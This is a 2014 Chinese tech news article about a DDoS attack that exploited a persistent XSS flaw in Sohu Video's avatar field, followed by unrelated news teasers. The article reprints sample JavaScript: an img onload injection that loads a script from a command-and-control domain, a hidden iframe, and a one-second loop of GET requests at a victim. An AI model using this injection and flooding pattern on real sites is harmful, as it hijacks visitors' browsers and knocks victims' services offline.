首页 > 外闻 > 关键词  > DDos攻击最新资讯  > 正文

搜狐视频XSS漏洞遭利用 千万用户成DDOS肉鸡

2014-04-30 16:46 · 稿源:站长之家

站长之家(Chinaz.com)4月30日消息 昨日,日本CDN服务商Incapsula撰文,称其一位用户遭受了一起特殊的应用层DDos攻击(分布式拒绝服务攻击),本次攻击中黑客使用的是流量劫持技术。据统计,共有超过2.2万的网民通过浏览器向该用户的网站发起了约为2000万次的GET请求。这些网民都是在非自愿,甚至不知情的情况下成为“帮凶”的。

Incapsula官方表示不方便透露相关网站信息,且其技术团队已在积极需找解决方案,一旦问题得到解决,便会公布更多相关细节。而据白帽子技术社区的相关信息显示,本次攻击事件中被利用的那个网站便是全球网站流量排名27的搜狐视频。

此外,Incapsula在官博中也对黑客攻击所使用的技术进行了解说,大致如下:

在此次攻击事件中,黑客利用持久性XSS漏洞,通过个人资料中的头像设置在标签中注入了JS代码。这样一来,该图片每被使用一次,相关恶意代码便会传染一次,任何用户访问上述页面,都会自动执行被恶意注入的JS代码,从而触发了隐藏的

示例代码:

// JavaScript Injection in <img> tag enabled by Persistent XSS

<img src="/imagename.jpg" onload="$.getScript('https://c&cdomain.com/index.html')" />

// Malicious JavaScript opens hidden <iframe>

function ddos(url) {

$("body").append("<iframe id='ifr11323' style='display:none;' src='https://c&cdomain.com/index.html'></iframe>"); }

// Ajax DDoS tool in executes GET request every second

<html><body>

<h1>Iframe</h1>

<script>

ddos('https://upload.chinaz.com//', 'https://upload.chinaz.com/2014/0430/1398849165905.jpg');

function ddos(url,url2){

window.setInterval(function (){

$.getScript(url);

$.getScript(url2);

},1000)

}

</script>

</body></html>

被“控制”的用户每秒都会向受害人的网站发起一次请求。每秒一次看似没有多大影响,但如果一段视频30分钟来说,每个用户在看视频时都会发出1800次的请求,试想若是有成千上万的用户在观看视频的话,会如何呢?

举报

  • 相关推荐
  • 给摄像头加上“腿”,深圳AI硬件公司拿下70万用户

    Enabot 的官方定位是陪伴机器人,也可以更粗暴地理解为一个“长了腿的摄像头”。 短视频中,你会看到各种在家庭生活中被迫缺席的人使用 Enabot 来陪伴家人、宠物,比如晚回家的丈夫会遥控 Enabot 来到妻子面前,用实时语音和妻子报备;不在家的爸爸,则会拜托妈妈把 Enabot 放到餐桌上陪孩子吃早餐;陪伴毛孩子也很普遍,有了“腿” 的 Enabot 监控、陪玩都不在话下……整体看

  • 小米通报海信Vidda商业诋毁案 称海信Vidda构成商业诋毁

    5月13日,小米法务部就与聚好看科技(海信旗下Vidda品牌)商业诋毁纠纷案终审结果发布声明。法院终审维持一审判决,认定聚好看2021年11月发布的含"米有问题""米有屌丝"等谐音文案的海报构成对小米商业诋毁,要求其在Vidda官微置顶致歉7天并赔偿小米55万元。Vidda已于5月10日发布致歉声明承认文案存在误导性。该案为净化行业竞争环境提供了司法范例,法院在审理中重点审查了涉案文案的语义指向性、传播范围及实际损害后果。小米强调企业竞争应遵循商业道德和法律规范,任何通过诋毁对手获取市场优势的行为都将受到法律制裁。(140字)

  • 供应商停产DDR3/DDR4:带动PC DRAM内存价格上涨近5%!

    快科技5月1日消息,据TrendForce最新内存现货价格趋势报告,全球三大DRAM供应商宣布即将停产DDR3和DDR4 DRAM,引发了现货市场的快速反应,买家纷纷提前囤积相关内存产品。这一停产消息部分抵消了因美国关税政策带来的观望情绪,一些买家甚至愿意接受价格上涨,以确保短期内有足够的库存,总体来看,补货需求的增加推动了现货价格的全面上涨。在PC DRAM模块方面,供应商宣布停产的决定影响了市场情绪,买家的囤货意愿上升,询价数量也有所增加,价格符合市场预期上涨,采购势头和交易量略有改善。不过下半年的需求情况仍存在不确定性。短期

  • 深圳雨后惊现手掌大的蜗牛 千万别碰

    广东多地近日出现超大蜗牛,经查为外来入侵物种"褐云玛瑙螺"。这种蜗牛体型巨大,壳长可达20厘米,繁殖力极强,每年可产卵4次,每次产卵量高达6000粒。它们不仅会严重危害农作物,还携带多种有害细菌和寄生虫,特别是广州管圆线虫,感染后可能导致脑膜炎等致命疾病。专家提醒市民切勿触碰,保持安全距离。

  • 把搜索变Reddit?谷歌正在测试“搜索论坛”功能

    谷歌似乎正计划在其搜索应用中添加一个讨论论坛,也许,“谷歌搜索论坛”就快要来了……

  • DDR4市场生变!美光紧随三星削减产能

    快科技4月23日消息,据媒体报道,继三星从2025年4月起停止生产1y和1z纳米工艺的8GB DDR4产品后,美光也通知客户将停产服务器用的旧版DDR4模块。同时,SK海力士也在削减DDR4产能,将其生产份额降至20%,这反映了整个行业的趋势,内存制造商加速产品过渡,将资源更多地投入到高端产品如HBM和DDR5中。三星已告知其供应链,基于1y和1z纳米工艺的8GB LPDDR4产品将在2025年4月达到产品生命周期的终点,最后订单截止日期为6月。此外,一些8GB和16GB的DDR4 SODIMM和UDIMM模块也将逐步淘汰,预计最后一批出货时间为2025年12月10日。分析人士指出,?

  • 飙脏话、性暗示……科技巨头开始利用“成人AI”赚钱了

    “我想要你!但我得知道你是否已经准备好了。” 这是一款人工智能(AI)聊天机器人对一名自称 14 岁的用户所说的话……

  • 落在身上的隐翅虫千万不要拍打 专家:应该吹走或拨开

    当前正值隐翅虫活跃季节,多地医疗机构接诊因接触隐翅虫引发皮肤炎症的患者数量明显上升。这种体长约1厘米的黑黄相间昆虫体内含强酸性毒液,拍打或压碎后接触皮肤会导致红肿、水疱等皮炎症状,严重者会出现皮肤溃烂。专家提醒发现隐翅虫时应轻轻吹走或用物品拨开,切忌直接拍打。若接触毒液应立即用大量清水冲洗并就医。建议夜间关好纱窗,减少与隐翅虫接触机会。近期南方地区降雨频繁,适宜隐翅虫繁殖,相关病例有所增加。医生建议出现症状时避免抓挠患处,防止继发感染,并及时就医。

  • 快手本地生活用户洞察报告:大力提振消费背景下,本地生活服务消费复苏“毛细血管”

    快手联合飞瓜数据发布《2025快手本地生活用户洞察报告》显示:2024年消费成为经济增长主要动力,社会消费品零售总额达48.3万亿元,其中服务消费增长6.2%。快手本地生活GMV同比增长200%,新线城市增长超220%,日支付用户数翻倍。报告预测2025年本地生活服务规模将超2.5万亿,城镇化率每提升1%可新增2000亿消费需求。快手依托短视频和直播生态,重构用户消费决策链条,2024年有动销短视频数量增长58%,直播增长265%。平台通过"搜索+内容"双轮驱动,第三季度月均搜索用户超5亿,搜索场景GMV增长286%。下沉市场与老铁经济形成正向循环,带动区域渗透率提升。报告为商家提供了穿越周期、制胜增量市场的发展路线图。(140字)

  • 伊拉克一富商被自己饲养的狮子咬死并吞食:后者因护食击毙

    伊拉克库法市一名50岁富商阿基尔·法赫尔丁在自家后院被其饲养的狮子袭击身亡。事发时男子试图与狮子互动,不料遭猛烈攻击,当场重伤致死,尸体大部分被狮子吞食。警方赶到后因狮子拒绝离开尸体,最终将其击毙。据悉死者生前常拍摄与狮子的互动视频炫耀,认为能驯化猛兽,但专家指出大型食肉动物野性难驯,与其互动需严格安全措施。狮子犬齿长达5-8厘米,咬合力惊人,能轻易咬断猎物气管,爪子锋利可伸缩,是致命武器。这起悲剧再次证明驯养猛兽存在巨大风险。